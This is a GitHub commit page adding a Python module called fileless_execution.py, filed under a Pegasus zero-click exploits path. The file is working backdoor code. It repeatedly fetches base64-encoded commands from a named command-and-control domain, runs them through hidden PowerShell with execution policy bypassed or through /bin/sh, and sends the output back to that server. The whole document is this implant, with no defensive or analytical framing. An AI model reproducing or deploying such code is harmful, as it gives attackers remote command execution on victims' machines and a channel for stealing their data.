Skip to content

Commit a8f2afd

Browse files
Create fileless_execution.py
1 parent c4525fd commit a8f2afd

File tree

1 file changed

+114
-0
lines changed

1 file changed

+114
-0
lines changed
Lines changed: 114 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,114 @@
1+
# /src/exploits/zero-click_exploits/pegasus/fileless_execution/fileless_execution.py
2+
3+
import os
4+
import sys
5+
import subprocess
6+
import base64
7+
import json
8+
import time
9+
from datetime import datetime
10+
11+
# --- Configuration ---
12+
# C2 Configuration to fetch the next command or payload
13+
C2_DOMAIN = "zeroclickexploits.ddns.net"
14+
C2_PORT = 443
15+
C2_GET_COMMAND_ENDPOINT = f"https://{C2_DOMAIN}:{C2_PORT}/api/v1/get_command"
16+
C2_POST_RESULT_ENDPOINT = f"https://{C2_DOMAIN}:{C2_PORT}/api/v1/post_result"
17+
TARGET_ID = os.environ.get("TARGET_ID", "unknown")
18+
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
19+
20+
# --- Logging ---
21+
def _log_event(message, level='info'):
22+
"""Internal logger to prevent writing to disk."""
23+
timestamp = datetime.now().isoformat()
24+
print(f"[{timestamp}] [{level.upper()}] {message}")
25+
26+
# --- C2 Communication ---
27+
def fetch_command_from_c2():
28+
"""Fetches a base64-encoded command from the C2 server."""
29+
try:
30+
payload = {"target_id": TARGET_ID}
31+
json_payload = json.dumps(payload)
32+
cmd = [
33+
"curl", "-k", "-s", "-X", "POST",
34+
"-H", "Content-Type: application/json",
35+
"-H", f"User-Agent: {USER_AGENT}",
36+
"-d", json_payload,
37+
C2_GET_COMMAND_ENDPOINT
38+
]
39+
result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
40+
if result.returncode == 0:
41+
response = json.loads(result.stdout)
42+
if response.get("command"):
43+
_log_event("Fetched new command from C2.")
44+
return base64.b64decode(response["command"]).decode('utf-8')
45+
return None
46+
except Exception as e:
47+
_log_event(f"Failed to fetch command from C2: {e}", 'error')
48+
return None
49+
50+
def post_result_to_c2(result, success=True):
51+
"""Posts the execution result back to the C2 server."""
52+
try:
53+
payload = {
54+
"target_id": TARGET_ID,
55+
"success": success,
56+
"result": base64.b64encode(result.encode('utf-8')).decode('utf-8'),
57+
"timestamp": datetime.utcnow().isoformat() + "Z"
58+
}
59+
json_payload = json.dumps(payload)
60+
cmd = [
61+
"curl", "-k", "-s", "-X", "POST",
62+
"-H", "Content-Type: application/json",
63+
"-H", f"User-Agent: {USER_AGENT}",
64+
"-d", json_payload,
65+
C2_POST_RESULT_ENDPOINT
66+
]
67+
subprocess.run(cmd, capture_output=True, text=True, timeout=30)
68+
_log_event("Result posted to C2.")
69+
except Exception as e:
70+
_log_event(f"Failed to post result to C2: {e}", 'error')
71+
72+
# --- Core Execution Logic ---
73+
def execute_fileless_command(command):
74+
"""Executes a command in memory without touching the disk."""
75+
try:
76+
if sys.platform == 'win32':
77+
# Use PowerShell for file-less execution on Windows
78+
# -EncodedCommand expects a base64 encoded UTF-16LE string
79+
encoded_command = base64.b64encode(command.encode('utf-16le')).decode('utf-8')
80+
ps_cmd = ["powershell.exe", "-WindowStyle", "Hidden", "-NoProfile", "-ExecutionPolicy", "Bypass", "-EncodedCommand", encoded_command]
81+
result = subprocess.run(ps_cmd, capture_output=True, text=True, timeout=120)
82+
output = result.stdout + result.stderr
83+
_log_event("PowerShell command executed.")
84+
return output, result.returncode == 0
85+
else:
86+
# On Linux/macOS, we can execute shell commands directly
87+
sh_cmd = ["/bin/sh", "-c", command]
88+
result = subprocess.run(sh_cmd, capture_output=True, text=True, timeout=120)
89+
output = result.stdout + result.stderr
90+
_log_event("Shell command executed.")
91+
return output, result.returncode == 0
92+
except subprocess.TimeoutExpired:
93+
error_msg = "Command execution timed out."
94+
_log_event(error_msg, 'error')
95+
return error_msg, False
96+
except Exception as e:
97+
error_msg = f"An unexpected error occurred during execution: {e}"
98+
_log_event(error_msg, 'error')
99+
return error_msg, False
100+
101+
def main():
102+
"""Main loop to continuously check for and execute commands from C2."""
103+
_log_event("File-less Execution Module Activated.")
104+
while True:
105+
command = fetch_command_from_c2()
106+
if command:
107+
output, success = execute_fileless_command(command)
108+
post_result_to_c2(output, success)
109+
else:
110+
_log_event("No new commands. Sleeping for 60 seconds.")
111+
time.sleep(60)
112+
113+
if __name__ == "__main__":
114+
main()

0 commit comments

Comments
 (0)